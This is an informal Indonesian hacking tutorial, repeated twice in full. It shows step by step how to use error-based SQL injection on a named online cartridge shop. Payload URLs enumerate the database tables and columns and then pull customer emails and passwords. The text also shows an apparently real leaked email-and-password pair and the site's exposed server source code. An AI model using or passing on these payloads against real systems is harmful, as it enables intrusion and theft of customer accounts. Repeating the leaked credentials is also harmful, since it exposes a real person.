http://bestcatridges.com/catridges/ProductsDetails.aspx?Productid=6
itu website buat contoh aje,hehehe
mulai ah
pertama lu hapus angka 6 ganti dengan
convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('')))
jadi :
http://bestcatridges.com/catridges/ProductsDetails.aspx?Productid=convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('')))
tar muncul error kaya gini :
Line 17: Dim strSql As String = "select * from products p join Subcategories S on p.subcategoryid=s.subcategoryid join companies Cm on s.companyid=Cm.companyid " & _
Line 18: "join Categories Ct on Ct.CategoryId=Cm.CategoryID and P.ProductID=" & Me.ViewState("ProductID")
Line 19: Dim dt As DataTable = GetDataTable(strSql)
Line 20: dlProductsDetails.DataSource = dt
Line 21: dlProductsDetails.DataBind()
Source File: E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb Line: 19
Stack Trace:
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Categories' to a column of data type int.]
System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +857370
System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +734982
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +188
System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +1838
System.Data.SqlClient.SqlDataReader.HasMoreRows() +150
System.Data.SqlClient.SqlDataReader.ReadInternal(Boolean setTimeout) +214
System.Data.SqlClient.SqlDataReader.Read() +9
System.Data.Common.DataAdapter.FillLoadDataRow(SchemaMapping mapping) +156
System.Data.Common.DataAdapter.FillFromReader(DataSet dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +153
System.Data.Common.DataAdapter.Fill(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +283
System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +221
System.Data.Common.DbDataAdapter.Fill(DataTable[] dataTables, Int32 startRecord, Int32 maxRecords, IDbCommand command, CommandBehavior behavior) +162
System.Data.Common.DbDataAdapter.Fill(DataTable dataTable) +107
BestCatridgeDAL.GetDataTable(String strSql) +60
ProductsDetails.BindProductDetails() in E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb:19
ProductsDetails.Page_Load(Object sender, EventArgs e) in E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb:10
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +47
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1061
nah tulisan yang gua bikin gede yaitu 'Categories' ini table pertama yang terdapat di website tadi,lu kopi,trus pastein diantara tanda '' yang ada di depan kata not in jadi :
http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('Categories')))
errornya jadi gini :
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Companies' to a column of data type int.]
nah trus lu kopi,trus paste setelah Categories dengan ditambahi , sebelum mastein
jadi not in ('Categories','Companies)))
uda terusin aja sampe table yang lu butuhin semisal gua pake table Customers aja yah :D
ok seteleh nemu errornya kaya gini :
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Customers' to a column of data type int.]
kita ganti sql injeksinya dengan
convert(int,(select top%201 column_name from information_schema.columns where table_name='Customers' and column_name not in ('')))
jadi :
http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select top%201 column_name from information_schema.columns where table_name='Customers' and column_name not in ('')))
tar muncul error yang ngasih value, pastein diantara tada '' yang ada di dalam kurung setelah not in ('')))
sampe data yang dibutuhin lengkap.
gua cuman butuh email ama password misalnya ,
ok
bisa :D
ganti sqlnya dengan :
convert(int,(select%20top%201%20convert
(%20varchar,isnull(convert(varchar,CustomerID),'NULL'))%2b'|--|'%2bconvert(varchar,isnull
(convert(varchar,EmailAddress),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,
Password),'NULL'))%20from%20Customers%20where%20CustomerID%20not%20in%20('')))
jadi :
http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select%20top%201%20convert
(%20varchar,isnull(convert(varchar,CustomerID),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert
(varchar,EmailAddress),'NULL'))
%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,Password),'NULL'))%20from%20Customers%20
where%20CustomerID%20not%20in%20('')))
nah tuh keliatan email ama passwordnya :D
yntax error converting the varchar value '1|--|factorh@yahoo.com|--|factorh' to a column of data type int.
udah tinggal kembangin ajah yah :D
itu website buat contoh aje,hehehe
mulai ah
pertama lu hapus angka 6 ganti dengan
convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('')))
jadi :
http://bestcatridges.com/catridges/ProductsDetails.aspx?Productid=convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('')))
tar muncul error kaya gini :
Line 17: Dim strSql As String = "select * from products p join Subcategories S on p.subcategoryid=s.subcategoryid join companies Cm on s.companyid=Cm.companyid " & _
Line 18: "join Categories Ct on Ct.CategoryId=Cm.CategoryID and P.ProductID=" & Me.ViewState("ProductID")
Line 19: Dim dt As DataTable = GetDataTable(strSql)
Line 20: dlProductsDetails.DataSource = dt
Line 21: dlProductsDetails.DataBind()
Source File: E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb Line: 19
Stack Trace:
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Categories' to a column of data type int.]
System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +857370
System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +734982
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +188
System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +1838
System.Data.SqlClient.SqlDataReader.HasMoreRows() +150
System.Data.SqlClient.SqlDataReader.ReadInternal(Boolean setTimeout) +214
System.Data.SqlClient.SqlDataReader.Read() +9
System.Data.Common.DataAdapter.FillLoadDataRow(SchemaMapping mapping) +156
System.Data.Common.DataAdapter.FillFromReader(DataSet dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +153
System.Data.Common.DataAdapter.Fill(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +283
System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +221
System.Data.Common.DbDataAdapter.Fill(DataTable[] dataTables, Int32 startRecord, Int32 maxRecords, IDbCommand command, CommandBehavior behavior) +162
System.Data.Common.DbDataAdapter.Fill(DataTable dataTable) +107
BestCatridgeDAL.GetDataTable(String strSql) +60
ProductsDetails.BindProductDetails() in E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb:19
ProductsDetails.Page_Load(Object sender, EventArgs e) in E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb:10
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +47
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1061
nah tulisan yang gua bikin gede yaitu 'Categories' ini table pertama yang terdapat di website tadi,lu kopi,trus pastein diantara tanda '' yang ada di depan kata not in jadi :
http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('Categories')))
errornya jadi gini :
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Companies' to a column of data type int.]
nah trus lu kopi,trus paste setelah Categories dengan ditambahi , sebelum mastein
jadi not in ('Categories','Companies)))
uda terusin aja sampe table yang lu butuhin semisal gua pake table Customers aja yah :D
ok seteleh nemu errornya kaya gini :
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Customers' to a column of data type int.]
kita ganti sql injeksinya dengan
convert(int,(select top%201 column_name from information_schema.columns where table_name='Customers' and column_name not in ('')))
jadi :
http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select top%201 column_name from information_schema.columns where table_name='Customers' and column_name not in ('')))
tar muncul error yang ngasih value, pastein diantara tada '' yang ada di dalam kurung setelah not in ('')))
sampe data yang dibutuhin lengkap.
gua cuman butuh email ama password misalnya ,
ok
bisa :D
ganti sqlnya dengan :
convert(int,(select%20top%201%20convert
(%20varchar,isnull(convert(varchar,CustomerID),'NULL'))%2b'|--|'%2bconvert(varchar,isnull
(convert(varchar,EmailAddress),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,
Password),'NULL'))%20from%20Customers%20where%20CustomerID%20not%20in%20('')))
jadi :
http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select%20top%201%20convert
(%20varchar,isnull(convert(varchar,CustomerID),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert
(varchar,EmailAddress),'NULL'))
%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,Password),'NULL'))%20from%20Customers%20
where%20CustomerID%20not%20in%20('')))
nah tuh keliatan email ama passwordnya :D
yntax error converting the varchar value '1|--|factorh@yahoo.com|--|factorh' to a column of data type int.
udah tinggal kembangin ajah yah :D
